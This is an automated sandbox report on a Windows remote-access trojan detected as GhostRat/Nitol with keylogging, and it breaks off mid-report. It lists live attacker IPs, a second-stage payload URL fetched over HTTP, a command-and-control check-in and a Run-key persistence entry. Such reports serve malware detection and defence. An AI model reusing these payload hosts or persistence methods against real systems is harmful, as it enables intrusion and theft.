                Indicator Removal                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe66%ReversingLabsWin32.Backdoor.Zegost
                SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe100%AviraHEUR/AGEN.1348656
                SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://106.52.15.123/system.exefalse
                  		unknown
                  110.40.45.163true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://106.52.15.123/system.exedSecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.0000000000618000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://106.52.15.123/system.exe.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.0000000000618000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://106.52.15.123/ySecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://106.52.15.123/system.exeON%LSecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.00000000008C0000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://106.52.15.123/system.exeuNoLSecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.00000000008C0000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://106.52.15.123/SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://106.52.15.123/system.exexSecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://106.52.15.123/system.exeW-SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.00000000007FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://106.52.15.123/system.exeC:SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpfalse
                                      		unknown
                                      http://106.52.15.123/system.exezSecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://106.52.15.123/HSecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://106.52.15.123/system.exeaSecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.000000000065A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://106.52.15.123/system.exe?SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              106.52.15.123
                                              		unknownChina
                                              		45090CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompafalse
                                              110.40.45.163
                                              		unknownChina
                                              		59011YLWLBeijingYunlinNetworkTechnologyCoLtdCNtrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1537400
                                              Start date and time:2024-10-18 22:24:14 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 9m 36s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:6
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                                              Detection:MAL
                                              Classification:mal100.bank.troj.spyw.evad.winEXE@3/1@0/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 87%
                                              • Number of executed functions: 50
                                              • Number of non-executed functions: 354
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240s for sample files taking high CPU consumption

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • VT rate limit hit for: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              16:26:11API Interceptor10592x Sleep call for process: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe modified
                                              22:25:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Dhttdfv.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                                              22:25:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Dhttdfv.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              106.52.15.123MrdWWzWXfM.exeGet hashmaliciousGhostRat, Nitol, Young LotusBrowse
                                                oFnrf0WhzT.exeGet hashmaliciousGhostRat, Nitol, Young LotusBrowse
                                                  D77wDrFT4o.exeGet hashmaliciousGhostRat, NitolBrowse
                                                    BP6F0BLekV.exeGet hashmaliciousGhostRat, NitolBrowse
                                                      iF16cTAvSa.exeGet hashmaliciousGhostRat, NitolBrowse
                                                        file.exeGet hashmaliciousGhostRat, NitolBrowse
                                                          file.exeGet hashmaliciousGhostRat, NitolBrowse
                                                            file.exeGet hashmaliciousGhostRat, NitolBrowse
                                                              zbvsZwaPi0.exeGet hashmaliciousAmadey, Raccoon Stealer v2, RedLine, Remcos, SmokeLoaderBrowse
                                                                K6jbVJCBk1.exeGet hashmaliciousGhostRat, NitolBrowse

                                                                  Domains

                                                                  No context

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  YLWLBeijingYunlinNetworkTechnologyCoLtdCNSecuriteInfo.com.Variant.Doina.34323.15716.609.exeGet hashmaliciousBlackMoonBrowse
                                                                  • 110.40.39.121
                                                                  KlRRP1oBzX.exeGet hashmaliciousReverse SSHBrowse
                                                                  • 110.41.185.246
                                                                  mqSWHFHsNJ.exeGet hashmaliciousSupershellBrowse
                                                                  • 110.40.139.46
                                                                  LisectAVT_2403002A_472.exeGet hashmaliciousUnknownBrowse
                                                                  • 110.40.35.49
                                                                  LisectAVT_2403002B_221.exeGet hashmaliciousGhostRat, NitolBrowse
                                                                  • 110.41.178.66
                                                                  code.exeGet hashmaliciousUnknownBrowse
                                                                  • 110.41.115.138
                                                                  code.exeGet hashmaliciousUnknownBrowse
                                                                  • 110.41.115.138
                                                                  9ic0UJ4Eah.exeGet hashmaliciousUnknownBrowse
                                                                  • 110.40.42.14
                                                                  aEzkowQO4H.exeGet hashmaliciousUnknownBrowse
                                                                  • 110.40.35.49
                                                                  yLoLnA3XkD.elfGet hashmaliciousMiraiBrowse
                                                                  • 110.40.57.197
                                                                  CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompabotnet.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 140.143.227.154
                                                                  spc.elfGet hashmaliciousMiraiBrowse
                                                                  • 118.89.114.216
                                                                  sh4.elfGet hashmaliciousMiraiBrowse
                                                                  • 49.232.220.95
                                                                  armv6l.elfGet hashmaliciousUnknownBrowse
                                                                  • 129.28.238.255
                                                                  sparc.elfGet hashmaliciousMiraiBrowse
                                                                  • 123.206.44.255
                                                                  spc.elfGet hashmaliciousMiraiBrowse
                                                                  • 111.231.39.31
                                                                  m68k.elfGet hashmaliciousUnknownBrowse
                                                                  • 119.29.176.81
                                                                  VysS7K9PPz.elfGet hashmaliciousMiraiBrowse
                                                                  • 152.136.201.41
                                                                  siU9XhyR5f.elfGet hashmaliciousMiraiBrowse
                                                                  • 212.129.191.203
                                                                  na.elfGet hashmaliciousMiraiBrowse
                                                                  • 49.232.220.93

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Windows\SysWOW64\Default.key

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):111
                                                                  Entropy (8bit):4.768200862561056
                                                                  Encrypted:false
                                                                  SSDEEP:3:StLl9aaN1135Na2/n6qxUbQl9aaN1135Na2/n6NODd8a:StR9fN1X4bw9fN1XFd8a
                                                                  MD5:3801C8D3ED6B004E9791EB6C185DE13B
                                                                  SHA1:6BCC85C23C2D134FDB83E3D419BBC7A2AEE7DD8A
                                                                  SHA-256:C64386B6FB1F813FF66AC76972E96E6B08F6230039FC84DF20E505447F5B7A9A
                                                                  SHA-512:DA80DF565E53839711F369DD53842E63AEDDD2E44F0E6248782E5EE2F2CA314CC2F6618CAC3F717784E702317086F84DCF2C8FC558ED40E43A19C73BE39B7EB4
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:oh9...X?0..oh9...X?PRPVOSROSZBBSTXPWXVQoh9....X?95+,?oh9...X?0..oh9...X?PRPVOSROSZBBSTXPWXWSoh9....X?.95+,?

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.619377781108329
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                                                                  File size:962'560 bytes
                                                                  MD5:b36366f4a27987d6de47887b03f29c68
                                                                  SHA1:6f290bd6c132ec5c824558a29bdf75d25ced94e3
                                                                  SHA256:4cc1ab70e6fd0d4441c778d40212c6e3114e14d56da85717214f8498e1c1501b
                                                                  SHA512:a9441175872e88fc49482ef4707fad0e1f15a3ee1f4c74f3a2fafd3744968025d35ca61ed1905239a01df58511985e00708cdae7cb9acae4cca8b51032e02359
                                                                  SSDEEP:24576:q4bDOphvGTO5+L0Un5cOoaPaoWXqEinqg4dNMBlqD9:HD2n+H5cOoUao+vib4rMu
                                                                  TLSH:C725E046E968523EF0564673C80AA98CD4B40DA02FF6C0772FEE3F9276F1677502AD46
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............N........+.......+......................%...............Rich............................PE..L......_...........

                                                                  File Icon

                                                                  Icon Hash:8f2b393142e03107

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x52ea19
                                                                  Entrypoint Section:.sedata
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x5FFDF708 [Tue Jan 12 19:22:48 2021 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:3a8897c84eb41f36b4bbabcc617408b8

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  call 00007F8AB07DE821h
                                                                  push ebx
                                                                  popad
                                                                  outsb
                                                                  imul ebp, dword ptr [bp+65h], 69685320h
                                                                  insb
                                                                  outsb
                                                                  and byte ptr [esi+32h], dh
                                                                  xor ebp, dword ptr [esi]
                                                                  cmp dword ptr [esi], ebp
                                                                  xor byte ptr [eax], al
                                                                  pushfd
                                                                  push esi
                                                                  cmc
                                                                  lea esp, dword ptr [esp+04h]
                                                                  jmp 00007F8AB07DE7C2h
                                                                  neg di
                                                                  xchg bh, bl
                                                                  mov bh, EFh
                                                                  mov bl, byte ptr [esp]
                                                                  lea ebx, dword ptr [edi-000000CFh]
                                                                  jmp 00007F8AB07DE830h
                                                                  aaa
                                                                  push ds
                                                                  imul ecx, dword ptr [eax-7405749Ah], D7BF66FDh
                                                                  jne 00007F8AB07DE78Bh
                                                                  sbb al, 24h
                                                                  jmp 00007F8AB07DE7DEh
                                                                  sub dword ptr [edi+56A95A3Fh], ebp
                                                                  inc ecx
                                                                  rcl byte ptr [esi+31h], FFFFFFC0h
                                                                  and bh, ch
                                                                  int3
                                                                  pop edi
                                                                  cmpsb
                                                                  ror dword ptr [ebx+3C8B243Ch], 1
                                                                  and al, E8h
                                                                  salc

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [C++] VS98 (6.0) SP6 build 8804
                                                                  • [ C ] VS98 (6.0) SP6 build 8804
                                                                  • [C++] VS98 (6.0) build 8168
                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1300530xa0.idata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1310000x17000.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x6e0000x1000089eaa871ac3ce54b93c0d2f65e1c1d4dFalse0.96875data7.927037404813812IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .sedata0x6f0000xc10000xc1000bf722ce480854acdf4d116fabeccb858False0.8490945292260362data7.819402663359735IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .idata0x1300000x10000x100047b645013f82c4711999b676bcf9a5b4False0.064697265625data0.6970172999319627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x1310000x170000x1700075995d4d0005aee52f82dae70db6f5d8False0.2623131793478261data4.015639241047175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .sedata0x1480000x10000x1000ab112cba3a4ada2c7d17504439e63a04False0.78076171875data7.981450049825861IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0x1312b00x668Device independent bitmap graphic, 48 x 96 x 4, image size 0ChineseChina0.5128048780487805
                                                                  RT_ICON0x1319180x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0ChineseChina0.6196236559139785
                                                                  RT_ICON0x131c000x128Device independent bitmap graphic, 16 x 32 x 4, image size 0ChineseChina0.6655405405405406
                                                                  RT_ICON0x131d280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0, 256 important colorsChineseChina0.5903518123667377
                                                                  RT_ICON0x132bd00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0, 256 important colorsChineseChina0.6926895306859205
                                                                  RT_ICON0x1334780x568Device independent bitmap graphic, 16 x 32 x 8, image size 0, 256 important colorsChineseChina0.5014450867052023
                                                                  RT_ICON0x1339e00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0ChineseChina0.19515260854134628
                                                                  RT_ICON0x1442080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0ChineseChina0.3253112033195021
                                                                  RT_ICON0x1467b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0ChineseChina0.40337711069418386
                                                                  RT_ICON0x1478580x468Device independent bitmap graphic, 16 x 32 x 32, image size 0ChineseChina0.5585106382978723
                                                                  RT_GROUP_ICON0x147cc00x92dataChineseChina0.6438356164383562
                                                                  RT_GROUP_ICON0x147d540x22dataChineseChina1.0
                                                                  RT_GROUP_ICON0x147d780x14dataChineseChina1.25

                                                                  Imports

                                                                  DLLImport
                                                                  KERNEL32.dllGetProcAddress
                                                                  MSVCRT.dllstrncpy
                                                                  IPHLPAPI.DLLGetInterfaceInfo
                                                                  PSAPI.DLLGetMappedFileNameW
                                                                  USER32.dllGetWindow
                                                                  ADVAPI32.dllRegDeleteKeyA
                                                                  SHELL32.dllSHGetFolderPathW

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  ChineseChina

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-10-18T22:25:41.952742+02002843729ETPRO MALWARE Win32/Fsysna.hlwd CnC Checkin1192.168.2.549796110.40.45.16370TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 18, 2024 22:25:40.823019981 CEST4979380192.168.2.5106.52.15.123
                                                                  Oct 18, 2024 22:25:40.828210115 CEST8049793106.52.15.123192.168.2.5
                                                                  Oct 18, 2024 22:25:40.828435898 CEST4979380192.168.2.5106.52.15.123
                                                                  Oct 18, 2024 22:25:40.828465939 CEST4979380192.168.2.5106.52.15.123
                                                                  Oct 18, 2024 22:25:40.833616972 CEST8049793106.52.15.123192.168.2.5
                                                                  Oct 18, 2024 22:25:41.502017021 CEST8049793106.52.15.123192.168.2.5
                                                                  Oct 18, 2024 22:25:41.502089977 CEST4979380192.168.2.5106.52.15.123
                                                                  Oct 18, 2024 22:25:41.502541065 CEST4979380192.168.2.5106.52.15.123
                                                                  Oct 18, 2024 22:25:41.508801937 CEST8049793106.52.15.123192.168.2.5
                                                                  Oct 18, 2024 22:25:41.534971952 CEST4979670192.168.2.5110.40.45.163
                                                                  Oct 18, 2024 22:25:41.540184975 CEST7049796110.40.45.163192.168.2.5
                                                                  Oct 18, 2024 22:25:41.540261030 CEST4979670192.168.2.5110.40.45.163
                                                                  Oct 18, 2024 22:25:41.952742100 CEST4979670192.168.2.5110.40.45.163
                                                                  Oct 18, 2024 22:25:41.957889080 CEST7049796110.40.45.163192.168.2.5
                                                                  Oct 18, 2024 22:26:29.150090933 CEST4997780192.168.2.5106.52.15.123
                                                                  Oct 18, 2024 22:26:29.155126095 CEST8049977106.52.15.123192.168.2.5
                                                                  Oct 18, 2024 22:26:29.155206919 CEST4997780192.168.2.5106.52.15.123
                                                                  Oct 18, 2024 22:26:29.158982992 CEST4997780192.168.2.5106.52.15.123
                                                                  Oct 18, 2024 22:26:29.163927078 CEST8049977106.52.15.123192.168.2.5
                                                                  Oct 18, 2024 22:26:29.838087082 CEST8049977106.52.15.123192.168.2.5
                                                                  Oct 18, 2024 22:26:29.838206053 CEST4997780192.168.2.5106.52.15.123
                                                                  Oct 18, 2024 22:26:30.235960007 CEST4997780192.168.2.5106.52.15.123
                                                                  Oct 18, 2024 22:26:30.240916967 CEST8049977106.52.15.123192.168.2.5
                                                                  Oct 18, 2024 22:26:36.457086086 CEST4997880192.168.2.5106.52.15.123
                                                                  Oct 18, 2024 22:26:36.462037086 CEST8049978106.52.15.123192.168.2.5
                                                                  Oct 18, 2024 22:26:36.462124109 CEST4997880192.168.2.5106.52.15.123
                                                                  Oct 18, 2024 22:26:36.462358952 CEST4997880192.168.2.5106.52.15.123
                                                                  Oct 18, 2024 22:26:36.468374968 CEST8049978106.52.15.123192.168.2.5
                                                                  Oct 18, 2024 22:26:37.162147045 CEST8049978106.52.15.123192.168.2.5
                                                                  Oct 18, 2024 22:26:37.162209034 CEST4997880192.168.2.5106.52.15.123
                                                                  Oct 18, 2024 22:26:37.162411928 CEST4997880192.168.2.5106.52.15.123
                                                                  Oct 18, 2024 22:26:37.167359114 CEST8049978106.52.15.123192.168.2.5
                                                                  Oct 18, 2024 22:28:41.960802078 CEST4979670192.168.2.5110.40.45.163
                                                                  Oct 18, 2024 22:28:41.965892076 CEST7049796110.40.45.163192.168.2.5

                                                                  HTTP Request Dependency Graph

                                                                  • 106.52.15.123

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.549793106.52.15.123801476C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 18, 2024 22:25:40.828465939 CEST282OUTGET /system.exe HTTP/1.1
                                                                  Accept: */*
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                  Host: 106.52.15.123
                                                                  Connection: Keep-Alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.549977106.52.15.123804068C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 18, 2024 22:26:29.158982992 CEST282OUTGET /system.exe HTTP/1.1
                                                                  Accept: */*
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                  Host: 106.52.15.123
                                                                  Connection: Keep-Alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.549978106.52.15.123806208C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 18, 2024 22:26:36.462358952 CEST282OUTGET /system.exe HTTP/1.1
                                                                  Accept: */*
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                  Host: 106.52.15.123
                                                                  Connection: Keep-Alive


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:16:25:08
                                                                  Start date:18/10/2024
                                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe"
                                                                  Imagebase:0x400000
                                                                  File size:962'560 bytes
                                                                  MD5 hash:B36366F4A27987D6DE47887B03F29C68
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_YoungLotus, Description: Yara detected Young Lotus, Source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Gh0st_ee6de6bc, Description: Identifies a variant of Gh0st Rat, Source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Gh0st_ee6de6bc, Description: Identifies a variant of Gh0st Rat, Source: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.4521410677.000000000282E000.00000040.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.2197052330.0000000002604000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:4
                                                                  Start time:16:25:51
                                                                  Start date:18/10/2024
                                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe"
                                                                  Imagebase:0x400000
                                                                  File size:962'560 bytes
                                                                  MD5 hash:B36366F4A27987D6DE47887B03F29C68
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
